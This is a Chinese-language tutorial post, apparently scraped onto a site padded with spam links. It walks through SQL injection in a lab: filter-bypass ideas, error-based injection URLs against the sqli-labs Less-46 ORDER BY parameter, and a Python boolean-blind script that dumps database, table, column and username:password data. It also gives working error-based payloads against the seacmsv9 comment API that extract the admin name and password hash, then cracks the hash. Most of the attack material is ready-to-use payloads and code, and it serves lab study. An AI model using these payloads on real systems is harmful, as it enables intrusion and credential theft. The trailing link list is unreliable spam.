当前位置: 首页 > wzjs >正文

建设网站需要的关键技术透明管理系统网站模板

建设网站需要的关键技术,透明管理系统网站模板,wordpress页码颜色,品牌营销方案模板目录 一、如何绕过 information schema 字段过滤注入 二、如何绕过 order by 语句过滤注入 三、seacmsv9 实现报错注入数据 一、如何绕过 information schema 字段过滤注入 1、使用其他系统表,不同数据库有各自的系统表,可替代information_schema。 …

目录

一、如何绕过 information schema 字段过滤注入

二、如何绕过 order by 语句过滤注入

三、seacmsv9 实现报错注入数据


一、如何绕过 information schema 字段过滤注入

1、使用其他系统表,不同数据库有各自的系统表,可替代information_schema。

2、使用盲注技术,布尔盲注(通过页面响应的差异判断查询结果)或者时间盲注(通过延时函数判断查询结果)。

3、使用报错注入获取其他表,通过构造恶意查询,触发数据库错误,从错误信息中提取表结构。

4、使用联合查询猜测数据。

5、利用特殊字符或者不同编码混淆,试图绕过过滤。 

二、如何绕过 order by 语句过滤注入

靶场第46关。

1、直接使用报错注入

数据库名:

http://192.168.58.5/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,(select%20database()%20),0x7e)))

 

用户名:

http://192.168.58.5/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,(select%20user()%20),0x7e)))

表名:

http://192.168.58.5/Less-46/index.php?sort=(extractvalue(1,concat((select%20group_concat(0x7e,table_name,0x7e)%20from%20information_schema.tables%20where%20table_schema=%27security%27))))

因为extractvalue只能容纳32个字节,我们需要将后面的字段截取出:

http://192.168.58.5/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(0x7e,table_name,0x7e)%20from%20information_schema.tables%20where%20table_schema=%27security%27),32,64))))

users表字段名:

http://192.168.58.5/Less-46/index.php?sort=(extractvalue(1,concat((select%20group_concat(0x7e,column_name,0x7e)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27))))

 

users表用户名和密码:

同样因为extractvalue只能容纳32个字节,所以我们分开截取。

前32位:

http://192.168.58.5/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(username,0x3a,password)%20from%20users),1,32))))

33-64位:

http://192.168.58.5/Less-46/index.php?sort=(extractvalue(1,concat(0x7e,substr((select%20group_concat(username,0x3a,password)%20from%20users),32,64))))

后面的数据依次类推。 

2、布尔盲注

编写python脚本:

import requests
from bs4 import BeautifulSoup# 获取用户名的函数
def get_username(resp):soup = BeautifulSoup(resp, 'html.parser')try:username = soup.select('body > div:nth-child(1) > font:nth-child(4) > tr > td:nth-child(2)')[0].textexcept IndexError:username = ""return username# 发送请求的函数
def send_request(payload):try:resp = requests.get(payload)return respexcept requests.RequestException as e:print(f"Request error: {e}")return None# 通用的注入函数,执行SQL注入并返回结果
def inject(url, query_template):data = ''i = 1while True:left = 32right = 127mid = (left + right) // 2while left < right:query = query_template.format(i=i, mid=mid)payload = f"{url}{query}"resp = send_request(payload)if resp and 'Dumb' == get_username(resp.text):left = mid + 1else:right = midmid = (left + right) // 2if mid == 32:breakdata += chr(mid)i += 1return data# 获取数据库名的函数
def inject_database(url):query_template = "sort=if(ascii(substr(database(),{i},1))>{mid},id,username) -- "database_name = inject(url, query_template)print(f"数据库名: {database_name}")# 获取表名的函数
def inject_tables(url):query_template = "sort=if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{i},1))>{mid},id,username) -- "tables = inject(url, query_template)print(f"表名有: {tables}")# 获取列名的函数
def inject_column(url, table_name):# 在query中用format替代i和mid的静态引用,避免name errorquery_template = f"sort=if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='{table_name}'),{{i}},1))>{{mid}},id,username) -- "columns = inject(url, query_template)print(f"{table_name}表中的字段有: {columns}")# 获取表数据的函数
def inject_data(url, table_name):query_template = f"sort=if(ascii(substr((select group_concat(username,':',password) from {table_name}),{{i}},1))>{{mid}},id,username) -- "user_data = inject(url, query_template)if user_data == "":print("该表中没有数据!")else:print(f"表{table_name}中的数据按照username:password的形式有: {user_data}")# 主程序
if __name__ == '__main__':url = 'http://192.168.58.5/Less-46/index.php?'# 获取数据库名inject_database(url)# 获取表名inject_tables(url)# 获取表名后,输入具体表名table_name = input("请输入需要获取数据的表名:")# 获取表的列名inject_column(url, table_name)# 获取表的数据inject_data(url, table_name)

代码效果:

三、seacmsv9 实现报错注入数据

seacmsv9的漏洞位置在文件目录下的comment\api\index.php中,漏洞参数是$rlist。

接下来开始报错注入:

数据库名:

http://192.168.58.6/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`,updatexml(1,concat_ws(0x7e,0x7e,database()),@`'`)

得知数据库名为seacms。

用户名:

http://192.168.58.6/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`,updatexml(1,concat_ws(0x7e,0x7e,user()),@`'`)

得知用户名为:root@localhost。

第一个表名:

http://192.168.58.6/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=database()%20limit%200,1))),%20@`%27`

表明为:sea_admin。

字段名:

http://192.168.58.6/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%201,1))),%20@`%27`

 用户名为:name。

http://192.168.58.6/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`%27`,%20extractvalue(1,concat_ws(0x7e,0x7e,(select%23%0acolumn_name%20from%23%0ainformation_schema.columns%20where%20table_schema%20=0x736561636d73%20and%20table_name=0x7365615f61646d696e%20limit%202,1))),%20@`%27`

密码字段为password。 

用户名:

http://192.168.58.6/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml (1,concat_ws(0x20,0x5c,(select name from%23%0asea_admin limit 0,1)),1), @`'`

用户名为admin。

密码:

http://192.168.58.6/comment/api/index.php?gid=1&page=2&type=1&rlist[]=@`'`, updatexml (1,concat_ws(0x20,0x5c,(select password from%23%0asea_admin limit 0,1)),1), @`'`

 

密码为密文的 f297a57a5a743894a0e4。猜测为md5加密方式。解密后为admin。


文章转载自:

http://leyvhSOj.LpmLx.cn
http://gSsKW970.LpmLx.cn
http://XV3cBEjm.LpmLx.cn
http://tbQpyTxl.LpmLx.cn
http://hYnULvbb.LpmLx.cn
http://uunWlRvE.LpmLx.cn
http://Bqu2CQh7.LpmLx.cn
http://YTcGOZgP.LpmLx.cn
http://TYhf5r0d.LpmLx.cn
http://0Doj5qNm.LpmLx.cn
http://QlZEq57r.LpmLx.cn
http://7cCwtAZn.LpmLx.cn
http://iugtngn5.LpmLx.cn
http://jogBlU2P.LpmLx.cn
http://9UASOL6a.LpmLx.cn
http://W71wz87N.LpmLx.cn
http://r97bnQJX.LpmLx.cn
http://5YYmpcRB.LpmLx.cn
http://vHF5eY1F.LpmLx.cn
http://4x6Ndt4O.LpmLx.cn
http://SPsgAaOg.LpmLx.cn
http://OmD1IkdC.LpmLx.cn
http://ubaguCwe.LpmLx.cn
http://rJmOI1fs.LpmLx.cn
http://ENa6IsKL.LpmLx.cn
http://9F1KZAd3.LpmLx.cn
http://MLFpS3A8.LpmLx.cn
http://hzKHyBFE.LpmLx.cn
http://QZfrNcLF.LpmLx.cn
http://2Rg3cKEL.LpmLx.cn
http://www.dtcms.com/wzjs/655449.html

相关文章:

  • 邯郸wap网站建设费用长春网站排名公司
  • 大团企业网站制作深圳市招聘网站
  • 网站建设在未来的发展趋势建设企业网站电话是多少
  • 网站地图模板.zipnode怎么做网站
  • 建设网站需要服务器吗重庆忠县网站建设公司电话
  • 郑州网站制作郑州网站制作案例品牌策划公司属于什么行业
  • 关于申请建设网站的请示枣阳网站建设等服务
  • nodejs做的网站wordpress资源占用
  • asp全静态企业网站合肥企业网站seo
  • 利用jsp做网站网站后台建设 招聘
  • 青岛网站建设方案公司企业年报信息公示流程
  • 网络 网站建设教育直播平台搭建
  • 网站反链如何做如何使用凡科建设网站
  • 广东 网站建设 公司排名wordpress 禁止转载
  • 嘉兴制作网站软件阿里服务器怎么做网站服务器
  • 海外百度云网站建设wordpress主题 推荐
  • 普通网站 用多说济南网络推广公司
  • 汽车4s店网站模板wordpress一键安装空间
  • 网站建设对公司来说重要吗大连企业网站哪一家好
  • 提供免费服务器的网站wordpress怎么上传文件
  • 绍兴网站制作计划免费域名app下载
  • 元气森林网络营销案例网站的优化策略
  • 网站 文章 keywords 和主页keywords黄石网站设计
  • 网站建设需要报告济南seo小黑seo
  • 备案用的网站建设方案书怎么写wordpress数组遍历
  • 中国十大购物网站排行榜网页设计素材和制作教程
  • 开关网站建设一键生成app下载
  • 新县住房和城乡规划建设局网站成都百度网站制作
  • 上海建桥学院门户网站知名网站建设联系电话
  • wordpress 企业站主题长沙网约车驾驶员资格证网上报名